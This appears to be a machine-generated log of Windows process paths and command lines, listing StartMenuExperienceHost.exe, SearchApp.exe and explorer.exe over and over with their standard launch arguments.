C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

